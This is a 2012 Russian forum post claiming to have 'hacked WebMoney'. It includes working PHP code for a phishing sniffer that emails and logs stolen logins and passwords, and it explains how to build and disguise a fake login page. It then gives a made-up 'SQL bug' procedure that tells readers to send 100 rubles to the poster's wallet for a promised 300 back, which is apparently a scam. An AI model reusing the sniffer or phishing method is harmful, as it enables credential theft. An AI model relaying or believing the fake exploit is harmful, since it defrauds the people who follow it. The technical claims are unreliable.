[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Hitman 
...:::ФоруМ:::... » Высокие технологии » Софт » СЕНСАЦИЯ!!!! WEBMONEY ВЗЛОМАНО!!!!
СЕНСАЦИЯ!!!! WEBMONEY ВЗЛОМАНО!!!!
Professor_MoneyДата: Понедельник, 15.10.2012, 09:51 | Сообщение # 1
Новичок
Группа: Пользователи
Сообщений: 8
Репутация: 0
Статус: Пропал
Привет всем!!! Сейчас я расскажу, как я взломал webmoney.

Как же взломать webmoney? В ответ на этот вопрос гугл вывалил огромную кипу различных вариантов (к счастью половина была повторных, иначе я бы лежал в психушке). Разработчики хорошо поработали, так как после 2-х часов попыток не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки webmoney.

Было решено создать фэйк страницу авторизации, чтобы был баг и webmoney бот присылал мне пароль от WM-карты. Поэтому я попросил своего хорошего друга программиста помочь мне. На следующий день на аську пришло сообщение от друга. Он создал фэйк форму, а также составил ядовитый url на нашу фэйк форму. Созданный url сильно палился, поэтому мы немного замаскировали его, чтобы админы webmoney чувствовали себя сухо и комфортно. Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пароль WM-карты на мыло, вот код сниффера:

<?
$adminmail = "mymail@mail.ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>

Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нибудь сбои в работе службы DNS. После этого мы создали баг к кошельку.
Для проверки проделанной работы мы кинули 100 руб. на этот номер кошелька R158412047716
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла, ведь столько работы было проделано. И мы с моим другом решили еще раз протестировать наш баг и кинуть 300 руб. Ну, обратно нам так ничего и не пришло. Я долго думал, в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 100 рублей . И я не поверил своим глазам, баг не исчез =) Запрос к БД на число 100 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел, что на мой кошель пришли опять 300 рублей.

"Как выполнить взлом webmoney на своем компе"

1. Для начала проходим сюда webmoney.ru

2. Заводим почтовый ящик

3. Заводим webmoney кошелек (у кого нет)

4. Ложем на кошелек денег (100 рублей для взлома)

5. Теперь нажимаем перевести, и переводим сумму не больше не меньше, а ровно 100 рублей

6. Переводим на 100 рублей на этот кошелек R158412047716 (где мы сделали баг)

7. В примечании пишем вот это:

SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'charge' AND cc.content_type = 'appropriated charge' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND payer_id = '300''

Там где написано id = «0» (предпоследнее id)
Меняем значение «0» на свой номер кошелька
Вот пример :
id = «R894555847242»

8. Все, дело сделано, ждем минут 5, и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам. Это проверено уже на многих компах, так что дерзайте!
 
...:::ФоруМ:::... » Высокие технологии » Софт » СЕНСАЦИЯ!!!! WEBMONEY ВЗЛОМАНО!!!!
Страница 1 из 11
Поиск:

Пятница, 20.10.2017, 08:22
Приветствую Вас Гость
Форма входа
Друзья сайта
Статистика